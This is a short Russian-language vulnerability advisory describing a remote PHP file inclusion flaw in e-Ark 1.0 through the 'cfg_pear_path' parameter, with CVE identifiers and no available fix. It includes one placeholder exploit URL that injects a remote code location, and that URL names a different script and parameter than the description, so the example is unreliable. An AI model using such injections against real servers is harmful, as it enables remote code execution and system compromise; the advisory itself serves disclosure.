PHP-инклюдинг в e-Ark

Дата публикации:
28.11.2006
Всего просмотров:
1317
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-6086
CVE-2007-5216
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
Раскрытие системных данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
e-Ark 1.x
Уязвимые версии: e-Ark 1.0, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "cfg_pear_path" в сценарии src/ark_inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://example/[ac_path]/spaw/spaw_control.class.php?spaw_root=[cmd_url]/

URL производителя: sourceforge.net/projects/e-ark

Решение: Способов устранения уязвимости не существует в настоящее время.

или введите имя

CAPTCHA